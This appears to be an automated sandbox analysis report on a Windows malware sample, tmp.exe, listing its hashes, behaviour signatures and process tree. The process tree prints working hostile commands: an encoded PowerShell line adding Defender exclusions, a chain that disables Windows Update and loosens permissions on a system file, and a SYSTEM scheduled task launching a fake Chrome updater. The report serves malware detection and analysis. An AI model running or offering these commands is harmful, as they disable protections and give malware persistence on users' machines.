Analysis
-
max time kernel
42s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
01-11-2022 22:38
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20220812-en
General
-
Target
tmp.exe
-
Size
1.8MB
-
MD5
6691c3106d5319f108114a48f5177396
-
SHA1
1ce92f03b5e7bd1c1d591141693f6e0261f3afee
-
SHA256
375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97
-
SHA512
19860f3c0479d5bbc5a7ccdaf609d68ec2007480cc8ea4becb5c0457ab4aeacdb6e0fa75e7d274436d5825342321bbb9d49468f3e990460b5b85a430c7ebdba7
-
SSDEEP
49152:+1rLSuOMv2pORqIwpn3AcRs3gzAiYSWTqP7:K3O02WyDQDDTqP
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 1356 takeown.exe 1412 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 1356 takeown.exe 1412 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 2 IoCs
Processes:
tmp.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe tmp.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe tmp.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 568 sc.exe 1268 sc.exe 584 sc.exe 1316 sc.exe 1072 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1956 reg.exe 628 reg.exe 552 reg.exe 852 reg.exe 1004 reg.exe 1508 reg.exe 1656 reg.exe 332 reg.exe 304 reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exetmp.exepid process 2036 powershell.exe 1660 tmp.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exetmp.exetakeown.exedescription pid process Token: SeDebugPrivilege 2036 powershell.exe Token: SeDebugPrivilege 1660 tmp.exe Token: SeTakeOwnershipPrivilege 1356 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tmp.execmd.execmd.execmd.exedescription pid process target process PID 1660 wrote to memory of 2036 1660 tmp.exe powershell.exe PID 1660 wrote to memory of 2036 1660 tmp.exe powershell.exe PID 1660 wrote to memory of 2036 1660 tmp.exe powershell.exe PID 1660 wrote to memory of 1972 1660 tmp.exe cmd.exe PID 1660 wrote to memory of 1972 1660 tmp.exe cmd.exe PID 1660 wrote to memory of 1972 1660 tmp.exe cmd.exe PID 1972 wrote to memory of 568 1972 cmd.exe sc.exe PID 1972 wrote to memory of 568 1972 cmd.exe sc.exe PID 1972 wrote to memory of 568 1972 cmd.exe sc.exe PID 1972 wrote to memory of 1268 1972 cmd.exe sc.exe PID 1972 wrote to memory of 1268 1972 cmd.exe sc.exe PID 1972 wrote to memory of 1268 1972 cmd.exe sc.exe PID 1972 wrote to memory of 584 1972 cmd.exe sc.exe PID 1972 wrote to memory of 584 1972 cmd.exe sc.exe PID 1972 wrote to memory of 584 1972 cmd.exe sc.exe PID 1972 wrote to memory of 1316 1972 cmd.exe sc.exe PID 1972 wrote to memory of 1316 1972 cmd.exe sc.exe PID 1972 wrote to memory of 1316 1972 cmd.exe sc.exe PID 1972 wrote to memory of 1072 1972 cmd.exe sc.exe PID 1972 wrote to memory of 1072 1972 cmd.exe sc.exe PID 1972 wrote to memory of 1072 1972 cmd.exe sc.exe PID 1972 wrote to memory of 852 1972 cmd.exe reg.exe PID 1972 wrote to memory of 852 1972 cmd.exe reg.exe PID 1972 wrote to memory of 852 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1004 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1004 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1004 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1508 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1508 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1508 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1956 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1956 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1956 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1656 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1656 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1656 1972 cmd.exe reg.exe PID 1972 wrote to memory of 1356 1972 cmd.exe takeown.exe PID 1972 wrote to memory of 1356 1972 cmd.exe takeown.exe PID 1972 wrote to memory of 1356 1972 cmd.exe takeown.exe PID 1972 wrote to memory of 1412 1972 cmd.exe icacls.exe PID 1972 wrote to memory of 1412 1972 cmd.exe icacls.exe PID 1972 wrote to memory of 1412 1972 cmd.exe icacls.exe PID 1660 wrote to memory of 1092 1660 tmp.exe cmd.exe PID 1660 wrote to memory of 1092 1660 tmp.exe cmd.exe PID 1660 wrote to memory of 1092 1660 tmp.exe cmd.exe PID 1660 wrote to memory of 1444 1660 tmp.exe cmd.exe PID 1660 wrote to memory of 1444 1660 tmp.exe cmd.exe PID 1660 wrote to memory of 1444 1660 tmp.exe cmd.exe PID 1092 wrote to memory of 1560 1092 cmd.exe schtasks.exe PID 1092 wrote to memory of 1560 1092 cmd.exe schtasks.exe PID 1092 wrote to memory of 1560 1092 cmd.exe schtasks.exe PID 1444 wrote to memory of 1996 1444 cmd.exe schtasks.exe PID 1444 wrote to memory of 1996 1444 cmd.exe schtasks.exe PID 1444 wrote to memory of 1996 1444 cmd.exe schtasks.exe PID 1972 wrote to memory of 332 1972 cmd.exe reg.exe PID 1972 wrote to memory of 332 1972 cmd.exe reg.exe PID 1972 wrote to memory of 332 1972 cmd.exe reg.exe PID 1972 wrote to memory of 304 1972 cmd.exe reg.exe PID 1972 wrote to memory of 304 1972 cmd.exe reg.exe PID 1972 wrote to memory of 304 1972 cmd.exe reg.exe PID 1972 wrote to memory of 628 1972 cmd.exe reg.exe PID 1972 wrote to memory of 628 1972 cmd.exe reg.exe PID 1972 wrote to memory of 628 1972 cmd.exe reg.exe PID 1972 wrote to memory of 552 1972 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAHcAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAcgBkACMAPgA="2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/304-81-0x0000000000000000-mapping.dmp
-
memory/332-80-0x0000000000000000-mapping.dmp
-
memory/552-83-0x0000000000000000-mapping.dmp
-
memory/568-64-0x0000000000000000-mapping.dmp
-
memory/584-66-0x0000000000000000-mapping.dmp
-
memory/628-82-0x0000000000000000-mapping.dmp
-
memory/852-69-0x0000000000000000-mapping.dmp
-
memory/900-84-0x0000000000000000-mapping.dmp
-
memory/976-89-0x0000000000000000-mapping.dmp
-
memory/1004-70-0x0000000000000000-mapping.dmp
-
memory/1072-68-0x0000000000000000-mapping.dmp
-
memory/1092-76-0x0000000000000000-mapping.dmp
-
memory/1112-88-0x0000000000000000-mapping.dmp
-
memory/1268-65-0x0000000000000000-mapping.dmp
-
memory/1316-67-0x0000000000000000-mapping.dmp
-
memory/1356-74-0x0000000000000000-mapping.dmp
-
memory/1412-75-0x0000000000000000-mapping.dmp
-
memory/1444-77-0x0000000000000000-mapping.dmp
-
memory/1508-71-0x0000000000000000-mapping.dmp
-
memory/1560-78-0x0000000000000000-mapping.dmp
-
memory/1608-87-0x0000000000000000-mapping.dmp
-
memory/1656-73-0x0000000000000000-mapping.dmp
-
memory/1660-54-0x000000013FD70000-0x000000013FF4E000-memory.dmpFilesize
1.9MB
-
memory/1660-55-0x000007FEFB871000-0x000007FEFB873000-memory.dmpFilesize
8KB
-
memory/1828-85-0x0000000000000000-mapping.dmp
-
memory/1956-72-0x0000000000000000-mapping.dmp
-
memory/1972-63-0x0000000000000000-mapping.dmp
-
memory/1996-79-0x0000000000000000-mapping.dmp
-
memory/2008-90-0x0000000000000000-mapping.dmp
-
memory/2028-86-0x0000000000000000-mapping.dmp
-
memory/2036-58-0x000007FEED370000-0x000007FEEDD93000-memory.dmpFilesize
10.1MB
-
memory/2036-59-0x000007FEEC810000-0x000007FEED36D000-memory.dmpFilesize
11.4MB
-
memory/2036-56-0x0000000000000000-mapping.dmp
-
memory/2036-60-0x00000000022E4000-0x00000000022E7000-memory.dmpFilesize
12KB
-
memory/2036-62-0x00000000022EB000-0x000000000230A000-memory.dmpFilesize
124KB
-
memory/2036-61-0x00000000022E4000-0x00000000022E7000-memory.dmpFilesize
12KB